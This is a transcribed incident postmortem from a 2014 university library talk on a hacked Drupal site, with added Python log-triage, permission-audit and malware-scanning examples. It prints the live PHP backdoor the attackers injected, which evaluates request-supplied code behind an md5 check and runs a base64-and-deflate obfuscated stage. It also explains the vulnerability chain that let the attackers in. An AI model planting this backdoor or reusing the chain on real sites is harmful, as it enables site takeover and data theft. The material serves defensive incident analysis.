Anatomy of a Drupal Hack - TechKnowFile 2014
Graham Stewart
Network and Storage Services Manager
Bilal Khalid
Senior Application Developer
University of Toronto Libraries
ITS at University of Toronto Libraries
=> wide range of services and resources in support of the Library’s role in supporting the research, teaching and learning mission of the university and its community.
=> develop and maintain digital collections and web-based resources
=> upward of 100 web sites, > 200 servers, ~1 PB storage, 56M visits to sites in FY 2012
Photo: Gordon Belray
Not just hardware ...
Collaborative environment between:
- programmers / developers / designers
- librarians
- sysadmins / operations
Technology environment:
- open source tools
- Linux (Ubuntu, Redhat), KVM
… and we’re hiring!
Drupal @UTL
[Architecture diagram: Drupal @UTL]
- User traffic arrives at a shared IP held by two HAProxy / Keepalived load balancers
- Application and caching: four web nodes, each running Varnish, APC and Apache & PHP
- Memcached / Keepalived: two nodes behind a shared IP
- Database: two MySQL servers behind a shared IP
- Storage: shared storage or rsync between the web nodes
February 14, 2013
12:10 “Armorial is down!”
12:18 “Update: Armorial down for 1.5 hours, server side issue? maybe caching?”
Symptom or root problem?
- Chef?
- MySQL error?
- Restart Apache?
- Restart server?
- Recent OS updates?
- PHP versions?
- Drupal customizations?
- Anything updated in Drupal?
Hacked !?#%$&!
Detection
- apache log analysis
- looked for odd traffic patterns
- in particular, isolated all wp-conf requests
- “hack” attempt started a couple of weeks before
- successful injection occurred the day before
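The log analysis the slides describe, as an added example that is not part of the original presentation: a small Python triage script run over a few constructed Apache combined-format log lines. The indicator rules are assumptions modelled on this incident (wp-conf probing, PHP requested from the upload directory, and the ch / php_code parameters used by the injected snippet shown later in the deck); the per-client first/last timestamps are what expose a probe that started weeks before the successful injection.

```python
import re
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Apache "combined" LogFormat (assumed; adapt the regex to a custom format).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Indicator rules (assumptions modelled on this incident). Each takes the
# request path and the parsed query string and returns True when flagged.
RULES = [
    ("wp-conf probe", lambda path, q: "wp-conf" in path),
    ("php in upload dir",
     lambda path, q: path.startswith("/sites/default/files/") and path.endswith(".php")),
    ("backdoor params", lambda path, q: "ch" in q and "php_code" in q),
]


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    rec["when"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def triage(lines):
    """Flag suspicious requests and summarise them per client IP.

    Returns (hits, per_ip): hits is a list of (rule, ip, method, target) in log
    order; per_ip maps ip -> {"count", "first", "last"}, where first/last are
    the datetimes of that client's earliest and latest flagged request.
    """
    hits, per_ip = [], {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:           # unparseable line: skip, do not crash the sweep
            continue
        for name, pred in RULES:
            if pred(rec["path"], rec["query"]):
                hits.append((name, rec["ip"], rec["method"], rec["target"]))
                s = per_ip.setdefault(rec["ip"], {"count": 0, "first": rec["when"], "last": rec["when"]})
                s["count"] += 1
                s["first"] = min(s["first"], rec["when"])
                s["last"] = max(s["last"], rec["when"])
    return hits, per_ip


# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Feb/2013:03:12:44 -0500] "GET /wp-conf.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Feb/2013:03:12:45 -0500] "GET /wp-config.php.bak HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [13/Feb/2013:22:05:01 -0500] "POST /sites/default/files/x.php HTTP/1.1" 200 35 "-" "curl/7.22"',
    '198.51.100.2 - - [13/Feb/2013:22:05:09 -0500] "GET /index.php?ch=secret&php_code=REDACTED HTTP/1.1" 200 1502 "-" "curl/7.22"',
    '192.0.2.10 - - [14/Feb/2013:12:01:33 -0500] "GET /node/12 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    found, clients = triage(SAMPLE_LOG)
    for hit in found:
        print("%-20s %-14s %s %s" % hit)
    for ip, s in clients.items():
        print(ip, s["count"], "flagged requests between", s["first"], "and", s["last"])
```

In practice the script is pointed at the rotated access logs for the weeks before the outage; the rules are deliberately narrow so that the first pass yields a short list of client IPs and a timeline rather than a pile of noise.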
Exploit...
FCKEditor Bug - allows XSS attacks
Sources:
https://drupal.org/node/1482528
http://webcache.googleusercontent.com/search?q=cache:http://exploitsdownload.com/exploit/na/drupal-fckeditorckeditor-php-execution
… + PHP Execution...
PHP Filter Module
- core module that allows ‘client’ PHP execution
- disabled by default
… + Permission issues...
Incorrect rwx permissions for sites/default/files
- allowed user-uploaded files to be executable by www-data
- www-data also had write permissions to /var/www!
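An added example (not from the presentation) of the permission check that would have caught both mistakes above: a Python audit that walks a Drupal docroot, flags executable or PHP-suffixed files under the upload directory and group/world-writable (or web-user-owned) entries in the code tree, plus the narrow remediation of stripping execute bits from uploads. The demo tree it builds in a temporary directory is constructed to reproduce the two mistakes; the web_user argument is an assumption for sites that want to check ownership as well as mode bits.

```python
import os
import stat
import tempfile


def audit_tree(root, upload_dir, web_user=None):
    """Walk a Drupal docroot and report permission findings.

    root       - the code tree (e.g. /var/www/drupal). The web server user must
                 not be able to write here, so group/world-writable entries (and,
                 when web_user is given, entries owned by that user) are flagged.
    upload_dir - the user-upload directory (sites/default/files) under root.
                 Nothing there should carry an execute bit or a PHP suffix.
    Returns a sorted list of (relative_path, finding) tuples.
    """
    findings = []
    upload_dir = os.path.abspath(upload_dir)
    web_uid = None
    if web_user is not None:
        import pwd  # POSIX only
        web_uid = pwd.getpwnam(web_user).pw_uid
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if stat.S_ISLNK(st.st_mode):
                continue
            mode = stat.S_IMODE(st.st_mode)
            rel = os.path.relpath(full, root)
            in_uploads = full == upload_dir or full.startswith(upload_dir + os.sep)
            if in_uploads:
                if stat.S_ISREG(st.st_mode) and mode & 0o111:
                    findings.append((rel, "upload is executable"))
                if name.lower().endswith((".php", ".phtml", ".phar")):
                    findings.append((rel, "php source in upload dir"))
            else:
                if mode & 0o022:
                    findings.append((rel, "code tree is group/world-writable"))
                if web_uid is not None and st.st_uid == web_uid:
                    findings.append((rel, "code tree owned by web server user"))
    return sorted(findings)


def strip_exec_bits(upload_dir):
    """Remediation: clear execute bits on regular files under upload_dir.
    Returns the number of files changed."""
    changed = 0
    for dirpath, _, filenames in os.walk(upload_dir):
        for name in filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if stat.S_ISREG(st.st_mode) and stat.S_IMODE(st.st_mode) & 0o111:
                os.chmod(full, stat.S_IMODE(st.st_mode) & ~0o111)
                changed += 1
    return changed


def build_demo_tree():
    """Constructed demo docroot reproducing the mistakes described: an executable
    upload, a .php file in the upload directory and a world-writable module
    directory. Returns (root, upload_dir)."""
    root = tempfile.mkdtemp(prefix="drupal-perm-demo-")
    uploads = os.path.join(root, "sites", "default", "files")
    modules = os.path.join(root, "sites", "all", "modules")
    os.makedirs(uploads)
    os.makedirs(modules)

    def put(path, mode):
        with open(path, "w") as fh:
            fh.write("demo\n")
        os.chmod(path, mode)

    put(os.path.join(uploads, "photo.jpg"), 0o644)       # fine
    put(os.path.join(uploads, "photo.jpg.php"), 0o644)   # flagged: PHP in uploads
    put(os.path.join(uploads, "shell.jpg"), 0o755)       # flagged: executable upload
    put(os.path.join(modules, "demo.module"), 0o644)
    os.chmod(modules, 0o777)                             # flagged: writable code tree
    os.chmod(uploads, 0o770)                             # uploads dir itself must be writable: not flagged
    return root, uploads


if __name__ == "__main__":
    demo_root, demo_uploads = build_demo_tree()
    for rel, finding in audit_tree(demo_root, demo_uploads):
        print("%-40s %s" % (rel, finding))
    print("execute bits stripped:", strip_exec_bits(demo_uploads))
```

Run periodically against the real docroot (the "periodic security sweeps" from the operational lessons) the audit is a cheap tripwire; note that mode bits alone do not stop Apache from running a .php file under the upload directory, so the PHP engine should also be switched off for that path in the web server configuration.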
… = Code Injection
Snippet found inserted at the top of random PHP files throughout the site:
// backdoor: runs attacker-supplied PHP from the request when 'ch' matches the hash,
// then unpacks and runs a second, obfuscated stage
if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == 'edd1d65d726121336405c4d2554df925') && isset($_REQUEST['php_code'])) {
    eval($_REQUEST['php_code']); exit();
}
eval(gzinflate(base64_decode('y0zTyCwuTi3RUIkPcg0MdQ0OiVZPzlCP1VRQU1PQyE0xxZSwtVVQT01JMUwxM00xNzIzNDI0NjYzMTBNNkkxMjU1SUmzNDJVB+vHMLkgoyA+OT8lFWiMpkK1QmpZYg4OaWuF1IrMEg0gXQsA')));
Reversing gzinflate:
Snooping Utility
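Two things a responder wants at this point, as an added example that is not part of the original presentation: a scanner that finds the injected pattern across a docroot, and the "reversing gzinflate" step that unpacks the obfuscated stage. PHP's gzinflate() is raw DEFLATE, which Python's zlib reads with wbits=-15. The infected file the demo builds is a constructed stand-in (placeholder hash, harmless inner stage); the indicator regexes are assumptions modelled on the snippet above.

```python
import base64
import os
import re
import tempfile
import zlib

# Indicators modelled on the injected snippet (assumptions, not a complete ruleset).
SUSPICIOUS = [
    ("eval of request input", re.compile(r"eval\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\b")),
    ("eval of packed payload", re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(")),
    ("md5-gated request check", re.compile(r"md5\s*\(\s*\$_(?:REQUEST|GET|POST)\[[^\]]+\]\s*\)\s*==")),
]
PACKED_RE = re.compile(r"gzinflate\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)")


def scan_php_source(src):
    """Return the indicator names matched by one PHP source string."""
    return [name for name, rx in SUSPICIOUS if rx.search(src)]


def scan_tree(root):
    """Scan every PHP-bearing file under root; return {relative_path: [indicators]} for hits only."""
    hits = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith((".php", ".inc", ".module")):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                found = scan_php_source(fh.read())
            if found:
                hits[os.path.relpath(full, root)] = found
    return hits


def gzinflate(blob_b64):
    """Reverse PHP's gzinflate(base64_decode(...)): base64, then raw DEFLATE (wbits=-15)."""
    return zlib.decompress(base64.b64decode(blob_b64), -15)


def extract_packed_payloads(src):
    """Decode every eval(gzinflate(base64_decode('...'))) stage in src, one level deep.
    Real samples often nest several layers; feed each result back in until it is plain PHP."""
    return [gzinflate(b).decode("utf-8", "replace") for b in PACKED_RE.findall(src)]


def pack(php_text):
    """Produce a raw-DEFLATE + base64 blob the way the obfuscator does.
    Used only to build the constructed demo file."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(c.compress(php_text.encode()) + c.flush()).decode()


def build_demo_file():
    """Constructed infected file: the snippet's shape with a placeholder hash and a harmless stage."""
    inner = "<?php /* constructed stand-in for the obfuscated stage */ echo 'snoop'; ?>"
    return ("<?php\n"
            "if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == 'PLACEHOLDER_HASH') "
            "&& isset($_REQUEST['php_code'])) {\n"
            "  eval($_REQUEST['php_code']); exit();\n}\n"
            "eval(gzinflate(base64_decode('" + pack(inner) + "')));\n"
            "// legitimate site code follows\n")


def write_demo_site():
    """Constructed demo docroot with one infected and one clean file; returns its path."""
    root = tempfile.mkdtemp(prefix="drupal-scan-demo-")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write(build_demo_file())
    with open(os.path.join(root, "clean.module"), "w") as fh:
        fh.write("<?php\nfunction demo_help() { return 'ok'; }\n")
    return root


if __name__ == "__main__":
    site = write_demo_site()
    for path, found in scan_tree(site).items():
        print(path, "->", ", ".join(found))
    for stage in extract_packed_payloads(build_demo_file()):
        print("decoded stage:", stage)
```

The scanner is a fallback; when the code tree is under version control (one of the operational lessons), a diff against the committed tree finds every modified file without needing to guess the pattern.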
Risk Exposure
- hijack/deface site
- ransomware => blackmail
- host their own content
- execute phishing attacks
- gain access to other sites on server (if any)
- exploit OS vulnerabilities
Risk Exposure
- use Drupal’s settings.php to gain access to the database/salt
- harvest public/private site content
- access personal user information (including passwords!!)
- access other dbs/sites if they use the same credentials
The Recovery - Restoration
- restored site from a couple of days prior
- all servers are backed up nightly (incl. files and db)
- at most 48 hours of data loss
- correct file-system permissions
- disabled FCKEditor, PHP Filter modules
- reset Drupal admin password
- changed all site users’ passwords
The Recovery - Communication
- contacted all potentially affected site members
- clear, honest communication
- possibility of personal information being leaked
- possibility passwords might have been compromised
- do users use the same passwords for other services?
Lessons Learned - Drupal
- first real Drupal problem
- follow Drupal security guidelines!
- https://drupal.org/security/secure-configuration
- vet the required core, contrib and custom modules for project
- stay on top of the updates
- test patches and updates and implement rapidly
- use https for all secure pages (whenever possible)
- install security modules
- Security Review, Security Kit, Login Security, ...
- if developing, use Drupal’s built-in checking functions
Lessons Learned - Operational
- review site security policies
- enforcement: periodic security sweeps
- tight control on production environments
- protect the core code with version control
- use https whenever authentication is involved
- mod_security to block attacks
- establish security analysis practices
- metrics
- traffic analysis
- log triggers and notifications
Embrace Failure
- Failure rarely has a single cause:
- systems are very complex, many interdependencies
- answers are not necessarily obvious
- weakness can be latent, triggered by other flaws
- red herrings
- swiss cheese
Source: John Allspaw: Advanced PostMortem Fu and Human Error 101
http://www.slideshare.net/jallspaw/advanced-postmortem-fu-and-human-error-101-velocity-2011
Lessons Learned - Cultural
- Everyone must have the organization’s end goals in mind
- Team of experts or team of poly-skilled polyglots?
- Emergency roles may differ from normal roles
- Emergency communication channels must be defined
- Failure rehearsals: deliberately break things
- The culture must be free of blame
Further Information
https://drupal.org/security/secure-configuration
https://drupal.org/writing-secure-code
http://www.cameronandwilding.com/blog/pablo/10-most-critical-drupal-security-risks
http://www.slideshare.net/jallspaw/advanced-postmortem-fu-and-human-error-101-velocity-2011
http://www.kitchensoap.com/
http://arstechnica.com/information-technology/2012/07/netflix-attacks-own-network-with-chaos-monkey-and-now-you-can-too/
Questions?
Thank You

Mais conteúdo relacionado

Mais procurados

Large Scale Crawling with Apache Nutch and Friends
Large Scale Crawling with Apache Nutch and FriendsLarge Scale Crawling with Apache Nutch and Friends
Large Scale Crawling with Apache Nutch and Friendslucenerevolution
 
Apache Hadoop & Hive installation with movie rating exercise
Apache Hadoop & Hive installation with movie rating exerciseApache Hadoop & Hive installation with movie rating exercise
Apache Hadoop & Hive installation with movie rating exerciseShiva Rama Krishna Dasharathi
 
Friends of Solr - Nutch & HDFS
Friends of Solr - Nutch & HDFSFriends of Solr - Nutch & HDFS
Friends of Solr - Nutch & HDFSSaumitra Srivastav
 
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...PROIDEA
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Install hadoop in a cluster
Install hadoop in a clusterInstall hadoop in a cluster
Install hadoop in a clusterXuhong Zhang
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...Fedir RYKHTIK
 
Web scraping with nutch solr
Web scraping with nutch solrWeb scraping with nutch solr
Web scraping with nutch solrMike Frampton
 
Elasticsearch logstash kibana meetup
Elasticsearch logstash kibana meetupElasticsearch logstash kibana meetup
Elasticsearch logstash kibana meetupBharvi Dixit
 
Java Security Manager Reloaded - jOpenSpace Lightning Talk
Java Security Manager Reloaded - jOpenSpace Lightning TalkJava Security Manager Reloaded - jOpenSpace Lightning Talk
Java Security Manager Reloaded - jOpenSpace Lightning TalkJosef Cacek
 
HDP Search Overview (APACHE SOLR & HADOOP)
HDP Search Overview (APACHE SOLR & HADOOP)HDP Search Overview (APACHE SOLR & HADOOP)
HDP Search Overview (APACHE SOLR & HADOOP)Chris Casano
 
Java Security Manager Reloaded - Devoxx 2014
Java Security Manager Reloaded - Devoxx 2014Java Security Manager Reloaded - Devoxx 2014
Java Security Manager Reloaded - Devoxx 2014Josef Cacek
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...bugcrowd
 
Firebird Interbase Database engine hacks or rtfm
Firebird Interbase Database engine hacks or rtfmFirebird Interbase Database engine hacks or rtfm
Firebird Interbase Database engine hacks or rtfmqqlan
 

Mais procurados (17)

Large Scale Crawling with Apache Nutch and Friends
Large Scale Crawling with Apache Nutch and FriendsLarge Scale Crawling with Apache Nutch and Friends
Large Scale Crawling with Apache Nutch and Friends
 
Apache Hadoop & Hive installation with movie rating exercise
Apache Hadoop & Hive installation with movie rating exerciseApache Hadoop & Hive installation with movie rating exercise
Apache Hadoop & Hive installation with movie rating exercise
 
2016 03 15_biological_databases_part4
2016 03 15_biological_databases_part42016 03 15_biological_databases_part4
2016 03 15_biological_databases_part4
 
Friends of Solr - Nutch & HDFS
Friends of Solr - Nutch & HDFSFriends of Solr - Nutch & HDFS
Friends of Solr - Nutch & HDFS
 
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
Install hadoop in a cluster
Install hadoop in a clusterInstall hadoop in a cluster
Install hadoop in a cluster
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 
Web scraping with nutch solr
Web scraping with nutch solrWeb scraping with nutch solr
Web scraping with nutch solr
 
Elasticsearch logstash kibana meetup
Elasticsearch logstash kibana meetupElasticsearch logstash kibana meetup
Elasticsearch logstash kibana meetup
 
null Bangalore meet - Php Security
null Bangalore meet - Php Securitynull Bangalore meet - Php Security
null Bangalore meet - Php Security
 
Java Security Manager Reloaded - jOpenSpace Lightning Talk
Java Security Manager Reloaded - jOpenSpace Lightning TalkJava Security Manager Reloaded - jOpenSpace Lightning Talk
Java Security Manager Reloaded - jOpenSpace Lightning Talk
 
HDP Search Overview (APACHE SOLR & HADOOP)
HDP Search Overview (APACHE SOLR & HADOOP)HDP Search Overview (APACHE SOLR & HADOOP)
HDP Search Overview (APACHE SOLR & HADOOP)
 
Java Security Manager Reloaded - Devoxx 2014
Java Security Manager Reloaded - Devoxx 2014Java Security Manager Reloaded - Devoxx 2014
Java Security Manager Reloaded - Devoxx 2014
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
 
Firebird Interbase Database engine hacks or rtfm
Firebird Interbase Database engine hacks or rtfmFirebird Interbase Database engine hacks or rtfm
Firebird Interbase Database engine hacks or rtfm
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET website
 

Semelhante a Anatomy of a Drupal Hack - TechKnowFile 2014

Environment for training models
Environment for training modelsEnvironment for training models
Environment for training modelsFlyElephant
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device InsecurityJeremy Brown
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainInfosecTrain
 
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014Greg Foss
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon praguehernanibf
 
Operating Docker
Operating DockerOperating Docker
Operating DockerJen Andre
 
Drupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp BratislavaDrupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp BratislavaGábor Hojtsy
 
Drupal Efficiency - Coding, Deployment, Scaling
Drupal Efficiency - Coding, Deployment, ScalingDrupal Efficiency - Coding, Deployment, Scaling
Drupal Efficiency - Coding, Deployment, Scalingsmattoon
 
Pragmatic Pipeline Security
Pragmatic Pipeline SecurityPragmatic Pipeline Security
Pragmatic Pipeline SecurityJames Wickett
 
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...APNIC
 
Continuous Security
Continuous SecurityContinuous Security
Continuous SecuritySysdig
 
Drupal Efficiency using open source technologies from Sun
Drupal Efficiency using open source technologies from SunDrupal Efficiency using open source technologies from Sun
Drupal Efficiency using open source technologies from Sunsmattoon
 
Web application security
Web application securityWeb application security
Web application securityRavi Raj
 
VB2013 - Security Research and Development Framework
VB2013 - Security Research and Development FrameworkVB2013 - Security Research and Development Framework
VB2013 - Security Research and Development FrameworkAmr Thabet
 
HTTPS + Let's Encrypt
HTTPS + Let's EncryptHTTPS + Let's Encrypt
HTTPS + Let's EncryptWalter Ebert
 
Doing Drupal security right
Doing Drupal security rightDoing Drupal security right
Doing Drupal security rightGábor Hojtsy
 
Doing Drupal security right from Drupalcon London
Doing Drupal security right from Drupalcon LondonDoing Drupal security right from Drupalcon London
Doing Drupal security right from Drupalcon LondonGábor Hojtsy
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentSteven Van den Hout
 

Semelhante a Anatomy of a Drupal Hack - TechKnowFile 2014 (20)

Environment for training models
Environment for training modelsEnvironment for training models
Environment for training models
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
 
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon prague
 
Operating Docker
Operating DockerOperating Docker
Operating Docker
 
Drupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp BratislavaDrupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp Bratislava
 
Drupal Efficiency - Coding, Deployment, Scaling
Drupal Efficiency - Coding, Deployment, ScalingDrupal Efficiency - Coding, Deployment, Scaling
Drupal Efficiency - Coding, Deployment, Scaling
 
Pragmatic Pipeline Security
Pragmatic Pipeline SecurityPragmatic Pipeline Security
Pragmatic Pipeline Security
 
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
 
Continuous Security
Continuous SecurityContinuous Security
Continuous Security
 
Drupal Efficiency using open source technologies from Sun
Drupal Efficiency using open source technologies from SunDrupal Efficiency using open source technologies from Sun
Drupal Efficiency using open source technologies from Sun
 
Web application security
Web application securityWeb application security
Web application security
 
Secure your site
Secure your siteSecure your site
Secure your site
 
Web Security... Level Up
Web Security... Level UpWeb Security... Level Up
Web Security... Level Up
 
VB2013 - Security Research and Development Framework
VB2013 - Security Research and Development FrameworkVB2013 - Security Research and Development Framework
VB2013 - Security Research and Development Framework
 
HTTPS + Let's Encrypt
HTTPS + Let's EncryptHTTPS + Let's Encrypt
HTTPS + Let's Encrypt
 
Doing Drupal security right
Doing Drupal security rightDoing Drupal security right
Doing Drupal security right
 
Doing Drupal security right from Drupalcon London
Doing Drupal security right from Drupalcon LondonDoing Drupal security right from Drupalcon London
Doing Drupal security right from Drupalcon London
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal Development
 

Mais de University of Toronto Libraries - Information Technology Services

Mais de University of Toronto Libraries - Information Technology Services (20)

ReEnvisioning E-Resource Holdings Management
ReEnvisioning E-Resource Holdings ManagementReEnvisioning E-Resource Holdings Management
ReEnvisioning E-Resource Holdings Management
 
Using Islandora Multi-sites to Sustain Faculty Digital Humanities Projects
Using Islandora Multi-sites to Sustain Faculty Digital Humanities ProjectsUsing Islandora Multi-sites to Sustain Faculty Digital Humanities Projects
Using Islandora Multi-sites to Sustain Faculty Digital Humanities Projects
 
Measure twice, cut once: Taking the time for user research in your redesign (...
Measure twice, cut once: Taking the time for user research in your redesign (...Measure twice, cut once: Taking the time for user research in your redesign (...
Measure twice, cut once: Taking the time for user research in your redesign (...
 
The Ontario library research cloud
The Ontario library research cloudThe Ontario library research cloud
The Ontario library research cloud
 
Digital preservation policy for humans
Digital preservation policy for humansDigital preservation policy for humans
Digital preservation policy for humans
 
Islandora and Omeka: Building U of T Digital Collections & Exhibits
Islandora and Omeka: Building U of T Digital Collections & ExhibitsIslandora and Omeka: Building U of T Digital Collections & Exhibits
Islandora and Omeka: Building U of T Digital Collections & Exhibits
 
Adding e-resources license information to library systems: three libraries’ a...
Adding e-resources license information to library systems: three libraries’ a...Adding e-resources license information to library systems: three libraries’ a...
Adding e-resources license information to library systems: three libraries’ a...
 
Collections UofT - TRY 2014
Collections UofT - TRY 2014Collections UofT - TRY 2014
Collections UofT - TRY 2014
 
Opportunities and Challenges Using Open Source Software in Academic Libraries...
Opportunities and Challenges Using Open Source Software in Academic Libraries...Opportunities and Challenges Using Open Source Software in Academic Libraries...
Opportunities and Challenges Using Open Source Software in Academic Libraries...
 
Accessibility Information Toolkit for Libraries - TRY 2014
Accessibility Information Toolkit for Libraries - TRY 2014Accessibility Information Toolkit for Libraries - TRY 2014
Accessibility Information Toolkit for Libraries - TRY 2014
 
Sustaining Continuous Digital Project Development with Team Project Managemen...
Sustaining Continuous Digital Project Development with Team Project Managemen...Sustaining Continuous Digital Project Development with Team Project Managemen...
Sustaining Continuous Digital Project Development with Team Project Managemen...
 
Facing our E-Demons: Challenges of E-Serial Management in a Large Academic Li...
Facing our E-Demons: Challenges of E-Serial Management in a Large Academic Li...Facing our E-Demons: Challenges of E-Serial Management in a Large Academic Li...
Facing our E-Demons: Challenges of E-Serial Management in a Large Academic Li...
 
Communicating Changes in Digital Services
Communicating Changes in Digital Services Communicating Changes in Digital Services
Communicating Changes in Digital Services
 
Why schema.org?
Why schema.org?Why schema.org?
Why schema.org?
 
Library Linked Data and the Future of Bibliographic Control
Library Linked Data and the Future of Bibliographic ControlLibrary Linked Data and the Future of Bibliographic Control
Library Linked Data and the Future of Bibliographic Control
 
Introduction to the Semantic Web
Introduction to the Semantic WebIntroduction to the Semantic Web
Introduction to the Semantic Web
 
Brave New eWorld: Struggles and Solutions
Brave New eWorld: Struggles and SolutionsBrave New eWorld: Struggles and Solutions
Brave New eWorld: Struggles and Solutions
 
Responsive Web Design at University of Toronto Libraries
Responsive Web Design at University of Toronto LibrariesResponsive Web Design at University of Toronto Libraries
Responsive Web Design at University of Toronto Libraries
 
My Media at University of Toronto Libraries
My Media at University of Toronto LibrariesMy Media at University of Toronto Libraries
My Media at University of Toronto Libraries
 
Digital Signage at University of Toronto Libraries
Digital Signage at University of Toronto LibrariesDigital Signage at University of Toronto Libraries
Digital Signage at University of Toronto Libraries
 

Último

#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
